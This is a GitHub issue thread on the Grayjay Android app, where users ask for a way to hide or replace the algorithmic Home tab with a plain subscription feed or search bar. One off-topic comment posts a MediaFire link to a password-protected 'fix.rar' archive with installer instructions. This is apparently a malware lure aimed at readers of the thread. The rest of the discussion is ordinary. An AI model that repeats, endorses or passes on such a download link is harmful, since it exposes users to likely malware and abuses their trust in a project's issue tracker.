### ISSUE TITLE
Feature to have better customizations of the "Home" screen

### ISSUE THREAD

**Issue by storopoli** [futo-org/grayjay-android#1268]
### Use Cases

Some people don't want ANY ALGORITHM at all for suggestions.
They have the channels/feeds they subscribe to and that's it.
They want a RSS feeder for Videos with the thumbnails, nothing more.

### Proposal

Add a Setting that toggles/untoggles the home tab.
Easy as this. Just yank the thing out.
Out of sight out of mind.

**Comment by storopoli** [comment]
PS: We can do this already in NewPipe.

**Comment by lamyergeier** [comment]
Yes this is absolutely necessary for me. I don't want  to see list of trending items in the home screen. 

A blank screen with a search bar would be sufficient.

**Comment by lamyergeier** [comment]
Possible to remove it in the settings. See Manage Tabs in Settings. 

But I would prefer alternate home screen with just a search bar.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by storopoli** [comment]
AMAZING! Yes uninstalling NewPipe and doing the full switch now!

**Comment by storopoli** [comment]
I honestly think that we should open a new issue. I'm closing this one.
